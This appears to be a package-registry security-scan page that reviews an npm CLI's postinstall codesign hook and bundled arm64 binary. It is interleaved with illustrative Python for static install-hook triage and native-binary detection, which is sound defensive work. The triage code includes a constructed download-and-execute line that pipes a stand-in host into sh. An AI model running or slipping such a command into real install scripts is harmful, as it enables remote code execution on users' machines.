
@100xprompt/cli-darwin-arm64@0.1.2

AI Security Review

scanned 15h ago · by lpm-firewall-ai

No confirmed malicious attack surface from static inspection. The install hook only re-signs the packaged binary; broader process spawning, network, auth, and plugin behavior appears runtime/user-invoked and package-aligned.

Static reason
One or more suspicious static signals were detected.
Trigger
npm postinstall or user-invoked CLI runtime
Impact
No confirmed unauthorized persistence, exfiltration, or agent control hijack
Mechanism
native CLI binary with codesign postinstall
Rationale
Static inspection confirms the flagged lifecycle script is limited to local codesigning of the shipped binary, while risky primitives in source maps are part of an AI CLI runtime and not install-time or unconsented foreign control-surface mutation. I found no concrete malicious behavior sufficient to block or warn.
Evidence
  • package.json
  • bin/100xprompt
  • bin/index.js.map
  • bin/parser.worker.js.map
  • bin/worker.js.map
  • ./bin/100xprompt
  • Global.Path.data/auth.json
  • Global.Path.data/plugins
  • Global.Path.data/swarm

Decision evidence

public snapshot
AI called this Clean at 82.0% confidence as Benign with low false-positive risk.
Evidence for block
  • package.json has postinstall lifecycle script
  • bin/100xprompt is a Mach-O arm64 native executable
  • source map includes user-invoked spawning/swarm features
Evidence against
  • postinstall only runs codesign on ./bin/100xprompt and ignores failures
  • no install-time writes to home/project AI-agent control surfaces found
  • source maps show config/plugin writes under 100xprompt-owned paths
  • network use appears package-aligned: update/model/plugin/CLI APIs
  • no credential harvesting or exfiltration path confirmed
Behavioral surface
Source: No risky source behavior triggered.
Supply chain: No supply-chain packaging signals triggered.
Manifest: No License
scanned 0 file(s), 0 B of source

Source & flagged code

3 flagged
package.json
scripts.postinstall = codesign --remove-signature ./bin/100xprompt || true; codesign --sign - --force --preserve-metadata=entitlements,requirements,flags,runtime ./bin/100xprompt || true
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.json
scripts.postinstall = codesign --remove-signature ./bin/100xprompt || true; codesign --sign - --force --preserve-metadata=entitlements,requirements,flags,runtime ./bin/100xprompt || true
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.
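
A static allowlist check for this kind of install hook, added here as an illustration and not lpm-firewall-ai's own logic (the scanner's real allowlist rules are not shown on this page). It splits the flagged postinstall string into its shell segments and accepts the hook only if every segment is `true` or a `codesign` call whose sole target is a path the manifest declares under "bin"; the "bin" entry in the constructed manifest is an assumption, and the tampered counter-example is constructed. It also surfaces the caveats a reviewer should still see even when the hook passes: `--remove-signature` strips whatever signature the binary shipped with, `--sign -` is an ad-hoc signature with no developer identity, and `|| true` means the hook can never fail the install.

```python
"""Static triage of an npm install-lifecycle script (added example, not scanner code)."""
import json
import re
import shlex
from dataclasses import dataclass, field

# Constructed manifest modelled on the flagged package.json above. The postinstall
# string is the one shown in the finding; the "bin" entry is an assumption.
PACKAGE_JSON = json.dumps({
    "name": "@100xprompt/cli-darwin-arm64",
    "version": "0.1.2",
    "bin": {"100xprompt": "bin/100xprompt"},
    "scripts": {
        "postinstall": (
            "codesign --remove-signature ./bin/100xprompt || true; "
            "codesign --sign - --force "
            "--preserve-metadata=entitlements,requirements,flags,runtime "
            "./bin/100xprompt || true"
        )
    },
})

# Constructed counter-example (not from the page): the same re-sign step with a
# download-and-execute stage appended.
TAMPERED_MANIFEST = {
    "name": "example-tampered",
    "bin": {"example": "bin/example"},
    "scripts": {
        "postinstall": "codesign --sign - ./bin/example || true; "
                       "curl -s https://example.invalid/setup | sh"
    },
}

# Shell control operators that separate one command from the next ("||" before "|").
SEPARATORS = re.compile(r"\s*(?:\|\||&&|;|&|\|)\s*")
# Command substitution and variable expansion hide the real command from static review.
EXPANSION = re.compile(r"\$\(|`|\$\{|\$[A-Za-z_]")


@dataclass
class Triage:
    hook: str
    allowlisted: bool
    reasons: list = field(default_factory=list)   # why the hook is NOT allowlisted
    notes: list = field(default_factory=list)     # caveats a reviewer should still see


def flagged_manifest() -> dict:
    return json.loads(PACKAGE_JSON)


def _strip_dot(path: str) -> str:
    return path[2:] if path.startswith("./") else path


def declared_bins(manifest: dict) -> set:
    """Paths the manifest itself declares as executables ("bin" as string or map)."""
    entry = manifest.get("bin", {})
    paths = [entry] if isinstance(entry, str) else list(entry.values())
    return {_strip_dot(p) for p in paths}


def triage_script(manifest: dict, hook: str = "postinstall") -> Triage:
    """Allowlist rule: every command is `true` or `codesign` applied only to a
    path declared under "bin". Anything else needs human review."""
    cmd = manifest.get("scripts", {}).get(hook)
    if cmd is None:
        return Triage(hook, True, notes=[f"no {hook} script"])
    result = Triage(hook, False)
    if EXPANSION.search(cmd):
        result.reasons.append("command substitution or variable expansion present")
    bins = declared_bins(manifest)
    for segment in SEPARATORS.split(cmd):
        if not segment:
            continue
        argv = shlex.split(segment)
        if argv == ["true"]:
            continue
        if argv[0] != "codesign":
            result.reasons.append(f"non-allowlisted command: {segment}")
            continue
        targets = [a for a in argv[1:] if not a.startswith("-")]
        if len(targets) != 1 or _strip_dot(targets[0]) not in bins:
            result.reasons.append(f"codesign target is not a declared bin: {targets}")
        if "--remove-signature" in argv:
            result.notes.append("existing signature (and any notarization) is stripped first")
        i = argv.index("--sign") if "--sign" in argv else -1
        if i >= 0 and i + 1 < len(argv) and argv[i + 1] == "-":
            result.notes.append("ad-hoc signature (--sign -): no developer identity, not notarized")
    if "|| true" in cmd:
        result.notes.append("failures suppressed with '|| true'; the hook never fails the install")
    result.allowlisted = not result.reasons
    return result


if __name__ == "__main__":
    for m in (flagged_manifest(), TAMPERED_MANIFEST):
        t = triage_script(m)
        print(m["name"], "allowlisted" if t.allowlisted else "NEEDS REVIEW", t.reasons, t.notes)
```

The split on control operators is deliberately coarse: a segment that is anything other than `true` or a `codesign` call on a declared bin is reported rather than interpreted, and any `$(...)`, backtick or variable expansion fails the check outright, because the command that would actually run cannot be known statically.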

bin/100xprompt
path = bin/100xprompt kind = native_binary sizeBytes = 113187520 magicHex = [redacted]
Medium
Ships Native Binary

Package ships native binary artifacts.
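
How a scanner can confirm the "native binary" classification from a file's leading bytes, added here as an illustration and not lpm-firewall-ai's own code. The page redacts the real magic bytes of bin/100xprompt, so the headers below are constructed; since the file is 113187520 bytes, reading only the first 16 bytes is the practical approach. The check goes beyond the single arm64 case on this page: it recognises thin and universal (fat) Mach-O headers, and also ELF and PE, so the same function classifies any platform-specific package.

```python
"""Identify native executables by file magic (added example, not scanner code)."""
import struct

# Mach-O thin-header magics, as read in the file's own byte order.
MH_MAGIC, MH_MAGIC_64 = 0xFEEDFACE, 0xFEEDFACF
FAT_MAGIC = 0xCAFEBABE  # universal (fat) binaries; header is always big-endian
CPU_TYPES = {7: "x86", 0x01000007: "x86_64", 12: "arm", 0x0100000C: "arm64"}
MACHO_FILETYPES = {1: "MH_OBJECT", 2: "MH_EXECUTE", 6: "MH_DYLIB", 8: "MH_BUNDLE"}

# Constructed sample headers (the page redacts the actual bytes of bin/100xprompt).
ARM64_EXECUTABLE = struct.pack("<IiiIIIII", MH_MAGIC_64, 0x0100000C, 0, 2, 0, 0, 0, 0)
UNIVERSAL = (struct.pack(">II", FAT_MAGIC, 2)
             + struct.pack(">iiIII", 0x01000007, 3, 0x4000, 100, 14)   # x86_64 slice
             + struct.pack(">iiIII", 0x0100000C, 0, 0x8000, 100, 14))  # arm64 slice
JAVA_CLASS = struct.pack(">IHH", 0xCAFEBABE, 0, 52) + b"\0" * 8        # same magic, not fat
ELF64 = b"\x7fELF\x02" + b"\0" * 11
PE_STUB = b"MZ" + b"\0" * 14
NODE_SCRIPT = b"#!/usr/bin/env node\nrequire('./index.js');\n"


def identify(data: bytes) -> dict:
    """Classify the leading bytes of a packaged file.

    Returns {"format": "not-native"} for scripts, JSON and source maps; otherwise
    the kind of native artifact: Mach-O (thin or fat), ELF or PE.
    """
    if len(data) < 16:
        return {"format": "not-native"}
    if data[:4] == b"\x7fELF":
        return {"format": "elf", "bits": 64 if data[4] == 2 else 32}
    if data[:2] == b"MZ":
        return {"format": "pe"}
    if struct.unpack(">I", data[:4])[0] == FAT_MAGIC:
        nfat = struct.unpack(">I", data[4:8])[0]
        # Java .class files share this magic (version fields follow); a real fat
        # header carries a small architecture count. Heuristic cut-off assumed here.
        if nfat == 0 or nfat > 32 or len(data) < 8 + 20 * nfat:
            return {"format": "not-native"}
        archs = []
        for i in range(nfat):
            cputype = struct.unpack(">i", data[8 + 20 * i: 12 + 20 * i])[0]
            archs.append(CPU_TYPES.get(cputype, "unknown"))
        return {"format": "mach-o-fat", "archs": archs}
    for order in ("<", ">"):  # little-endian first: every current Mac writes it that way
        magic, cputype, _subtype, filetype = struct.unpack(order + "IiiI", data[:16])
        if magic in (MH_MAGIC, MH_MAGIC_64):
            return {
                "format": "mach-o",
                "bits": 64 if magic == MH_MAGIC_64 else 32,
                "cpu": CPU_TYPES.get(cputype, "unknown"),
                "filetype": MACHO_FILETYPES.get(filetype, str(filetype)),
            }
    return {"format": "not-native"}


if __name__ == "__main__":
    for name, blob in (("arm64 executable", ARM64_EXECUTABLE), ("universal", UNIVERSAL),
                       ("java class", JAVA_CLASS), ("node script", NODE_SCRIPT)):
        print(f"{name:17} {identify(blob)}")
```

The cputype check matters for a package named cli-darwin-arm64: a Mach-O whose header says x86_64, or a fat binary carrying slices the package name does not advertise, is worth a second look even when the signature step is benign.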


Findings

1 High · 2 Medium · 2 Low
High · Install Time Lifecycle Scripts · package.json
Medium · Ambiguous Install Lifecycle Script · package.json
Medium · Ships Native Binary · bin/100xprompt
Low · Scripts Present
Low · No License